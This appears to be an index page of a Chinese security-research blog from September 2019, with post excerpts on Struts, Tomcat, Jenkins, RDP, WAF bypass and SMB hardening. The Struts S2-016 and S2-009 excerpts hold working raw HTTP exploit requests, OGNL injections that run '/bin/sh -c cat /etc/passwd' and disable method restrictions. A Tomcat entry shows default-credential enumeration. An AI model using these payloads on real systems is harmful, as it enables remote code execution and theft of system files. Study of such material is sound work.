September 11, 2019
Struts S2-016 HTTP Raw TEXT <!–more–> 利用请求 POST /login.action HTTP/1.1 Cookie: SessionId=96F3F15432E0660E0654B1CE240C4C36 User-Agent: Java/1.8.0_212 Host: 192.168.198.133 Accept: text/html, image/gif, image/jpeg, *; q=.2, /; q=.2 Connection: keep-alive Content-type: application/x-www-form-urlencoded Content-Length: 651 redirect:%24%7B%23resp%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%28new+java.lang.ProcessBuilder(new+java.lang.String[]{‘/bin/sh’,’-c’,’cat+/etc/passwd’})).start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23dis%3Dnew+java.io.DataInputStream%28%23b%29%2C%23buf%3Dnew+byte%5B20000%5D%2C%23dis.read%28%23buf%29%2C%23msg%3Dnew+java.lang.String%28%23buf%29%2C%23dis.close%28%29%2C%23resp.getWriter%28%29.println%28%23msg.trim%28%29%29%2C%23resp.getWriter%28%29.flush%28%29%2C%23resp.getWriter%28%29.close%28%29%7D= HTTP/1.1 200 OK Server: nginx/1.12.2 Date: Wed, 11 Sep 2019 07:07:30 GMT Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: JSESSIONID=E251191A83A1CD97EE09BD19BC45A877-n1; Path=/ Content-Language: zh-CN 679 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin […]
September 11, 2019
Struts S2-009 HTTP Raw TEXT <!–more–> 正文 POST /login.action HTTP/1.1 Cookie: SessionId=96F3F15432E0660E0654B1CE240C4C36 User-Agent: Java/1.8.0_212 Host: 192.168.198.133 Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: keep-alive Content-type: application/x-www-form-urlencoded Content-Length: 444 class.classLoader.jarPath=%28%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess%5b%22allowStaticMethodAccess%22%5d%3dtrue%2c%23outstr%3d@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2c%23outstr.print%28%22webpath%22%29%2c%23outstr.println%28%22888888%22%29%2c%23outstr.close%28%29%29%28meh%29&z%5b%28class.classLoader.jarPath%29%28%27meh%27%29%5d= HTTP/1.1 200 OK Server: nginx/1.12.2 Date: Wed, 11 Sep 2019 04:00:24 GMT Content-Length: 15 Connection: keep-alive Set-Cookie: JSESSIONID=16985C7B820E22E13767E10B8AD57496-n1; Path=/ Content-Language: zh-CN webpath888888
September 11, 2019
Wireshark 常用的过滤器 | Wireshark frequently used filters
September 11, 2019
CVE-2019-0788 微软远程桌面客户端远程任意代码执行漏洞 <!–more–> 正文 mstsc 客户端连接 恶意 rdp 服务端时可能被服务端远程执行代码。 用途 内网钓鱼 蜜罐反打 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0788 https://www.tenable.com/blog/microsofts-september-2019-patch-tuesday-tenable-roundup
September 11, 2019
CVE-2019-1003000 Jenkins RCE PoC or simple pre-auth remote code execution on the Server <!–more–> 正文 https://medium.com/@valeriyshevchenko/jenkins-rce-poc-or-simple-pre-auth-remote-code-execution-on-the-server-d18b868a77cb
September 10, 2019
【Nessus】SMB Signing not required <!–more–> 漏洞细节 SMB Signing not required https://www.tenable.com/plugins/nessus/57608 修复方案 以 Windows Server 2008 R2 为例 1 备份注册表 (选择 计算机/Computer 这个根目录 导出) 2 运行注册表编辑器 (regedt.msc/Regedt32.exe) 3 选择 HKEY_LOCAL_MACHINE 之后再选择 System\CurrentControlSet\Services\LanManServer\Paramete 等 4 在此配置项中添加 以下内容 Value Name: EnableSecuritySignature Data Type: REG_DWORD Data: 0 (disable), 1 (enable) NOTE: The default is 0 (disable) Name: RequireSecuritySignature […]
September 10, 2019
使用蜜罐捕获在野 IoT Botnet 蠕虫样本以及 0 day <!–more–> 相关信息 作者: 奇虎 360 Netlab 叶根深 https://github.com/zom3y3 https://twitter.com/zom3y3 相关公开演说: Kcon 2019: 如何去挖掘物联网环境中的高级恶意软件威胁 https://drive.google.com/file/d/1H_NX2L3KebS9-f1oPS8IbVg9CfWuOj4U/view Kcon 2016: 与僵尸网络攻防对抗的激情岁月 https://github.com/zom3y3/slides/blob/master/%5BKCon%202016%5D0828_9_b1t_%E4%B8%8E%E5%83%B5%E5%B0%B8%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AF%B9%E6%8A%97%E7%9A%84%E6%BF%80%E6%83%85%E5%B2%81%E6%9C%88.pdf 开源蜜罐 https://hfish.io/docs/#/plug/use https://hfish.io/docs/#/plug/use
September 10, 2019
Tomcat 8 Manager 用户认证凭据枚举 <!–more–> HTTP 交互分析 采用 HTTP Basic Auth 认证请求 GET /manager/html HTTP/1.1 Host: 192.168.198.133:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Authorization: Basic dG9tY2F0OnRvbWNhdA== 认证成功的 HTTP 响应头 HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Expires: Thu, 01 Jan 1970 00:00:00 UTC Set-Cookie: JSESSIONID=1CA160B50A85CD4F22555D92B051B7C9; Path=/manager; HttpOnly Content-Type: text/html;charset=utf-8 Date: Tue, […]
September 9, 2019
利用 Rapid 7 的公开数据搭建 Passive DNS <!–more–> 正文 1 https://dns.bufferover.run/dns?q=baidu.com 2 https://github.com/erbbysam/DNSGrep
September 9, 2019
WAF攻防研究之四个层次Bypass WAF <!–more–> 摘要 WAF攻防研究之四个层次Bypass WAF 绕过WAF的相关技术研究是WAF攻防研究非常重要的一部分,也是最有趣的部分,所以我在写WAF攻防时先写攻击部分。还是那句老话“不知攻焉知防”,如果连绕过WAF方法都不知道,怎么保证WAF能保护后端服务的安全。在我看来,WAF的绕过技术的研究将不断驱动防御水平提高。 以前一些WAF bypass的文章更像CASE的整理,都把焦点放在了规则对抗层面。绕过WAF规则,更像是正面对抗,属于下策。一直关注规则层面的绕过,太局限视野,看不到WAF在其他方面问题。木桶原理,防御能力并不会有本质的提高。本文将从4个层次讲解bypass WAF的技术,全方位提升WAF的防御能力。 讲完相关攻击技术后,以后再探讨WAF的设计架构、防御策略,这样显得每一处的考虑都是有意义的。 从架构层Bypass WAF 。 从资源限角度bypass WAF。 从协议层面bypass WAF。 从规则缺陷bypass WAF。 参考资料 https://weibo.com/ttarticle/p/show?id=2309404007261092631700&display=0&retcode=6102